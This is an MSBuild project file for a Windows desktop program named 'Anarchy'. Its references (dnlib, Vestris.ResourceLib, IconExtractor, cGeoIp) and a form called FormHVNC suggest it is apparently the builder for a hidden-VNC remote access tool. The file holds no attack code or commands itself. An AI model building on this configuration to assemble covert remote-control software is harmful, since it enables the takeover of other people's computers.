<Project Sdk="Microsoft.NET.Sdk.WindowsDesktop">
  <PropertyGroup>
    <AssemblyName>Anarchy</AssemblyName>
    <GenerateAssemblyInfo>False</GenerateAssemblyInfo>
    <OutputType>WinExe</OutputType>
    <UseWindowsForms>True</UseWindowsForms>
    <TargetFramework>net48</TargetFramework>
  </PropertyGroup>
  <PropertyGroup>
    <LangVersion>10.0</LangVersion>
    <AllowUnsafeBlocks>True</AllowUnsafeBlocks>
  </PropertyGroup>
  <PropertyGroup>
    <ApplicationIcon>app.ico</ApplicationIcon>
    <RootNamespace>Anarchy</RootNamespace>
    <RunAnalyzersDuringBuild>False</RunAnalyzersDuringBuild>
    <RunAnalyzersDuringLiveAnalysis>False</RunAnalyzersDuringLiveAnalysis>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|AnyCPU'">
    <WarningLevel>0</WarningLevel>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|AnyCPU'">
    <WarningLevel>0</WarningLevel>
  </PropertyGroup>
  <ItemGroup>
    <None Remove="Program.cs~RF3e73973.TMP" />
  </ItemGroup>
  <ItemGroup>
    <Content Include="app.ico" />
  </ItemGroup>
  <ItemGroup>
    <PackageReference Include="BouncyCastle" Version="1.8.9" />
    <PackageReference Include="Costura.Fody" Version="5.7.0">
      <PrivateAssets>all</PrivateAssets>
      <IncludeAssets>runtime; build; native; contentfiles; analyzers; buildtransitive</IncludeAssets>
    </PackageReference>
    <PackageReference Include="Fody" Version="6.6.3">
      <PrivateAssets>all</PrivateAssets>
      <IncludeAssets>runtime; build; native; contentfiles; analyzers; buildtransitive</IncludeAssets>
    </PackageReference>
    <PackageReference Include="Newtonsoft.Json" Version="13.0.1" />
  </ItemGroup>
  <ItemGroup>
    <Reference Include="cGeoIp">
      <HintPath>bin\Release\net461\cgeoip.dll</HintPath>
    </Reference>
    <Reference Include="DiscordRPC">
      <HintPath>bin\Release\net461\discordrpc.dll</HintPath>
    </Reference>
    <Reference Include="dnlib">
      <HintPath>bin\Release\net461\dnlib.dll</HintPath>
    </Reference>
    <Reference Include="Guna.UI2">
      <HintPath>bin\Release\net461\guna.ui2.dll</HintPath>
    </Reference>
    <Reference Include="IconExtractor">
      <HintPath>bin\Release\net461\iconextractor.dll</HintPath>
    </Reference>
    <Reference Include="Leaf.xNet">
      <HintPath>bin\Release\net461\leaf.xnet.dll</HintPath>
    </Reference>
    <Reference Include="MetroSet UI">
      <HintPath>bin\Release\net461\metroset ui.dll</HintPath>
    </Reference>
    <Reference Include="PresentationFramework" />
    <Reference Include="protobuf-net">
      <HintPath>bin\Release\net461\protobuf-net.dll</HintPath>
    </Reference>
    <Reference Include="ReaLTaiizor">
      <HintPath>bin\Release\net461\realtaiizor.dll</HintPath>
    </Reference>
    <Reference Include="ScintillaNET">
      <HintPath>bin\Release\net461\scintillanet.dll</HintPath>
    </Reference>
    <Reference Include="Siticone.UI">
      <HintPath>bin\Release\net461\siticone.ui.dll</HintPath>
    </Reference>
    <Reference Include="System.Design" />
    <Reference Include="System.DirectoryServices" />
    <Reference Include="System.Management" />
    <Reference Include="System.Core" />
    <Reference Include="Microsoft.VisualBasic" />
    <Reference Include="System.Windows" />
    <Reference Include="System.IO.Compression.FileSystem" />
    <Reference Include="System.IO.Compression" />
    <Reference Include="System.Web" />
    <Reference Include="Vestris.ResourceLib">
      <HintPath>bin\Release\net461\vestris.resourcelib.dll</HintPath>
    </Reference>
  </ItemGroup>
  <ItemGroup>
    <Compile Update="Forms\FormHVNC.cs">
      <SubType>Form</SubType>
    </Compile>
    <Compile Update="Properties\Resources.Designer.cs">
      <DesignTime>True</DesignTime>
      <AutoGen>True</AutoGen>
      <DependentUpon>Resources.resx</DependentUpon>
    </Compile>
  </ItemGroup>
  <ItemGroup>
    <EmbeddedResource Update="Properties\Resources.resx">
      <Generator>PublicResXFileCodeGenerator</Generator>
      <LastGenOutput>Resources.Designer.cs</LastGenOutput>
    </EmbeddedResource>
  </ItemGroup>
</Project>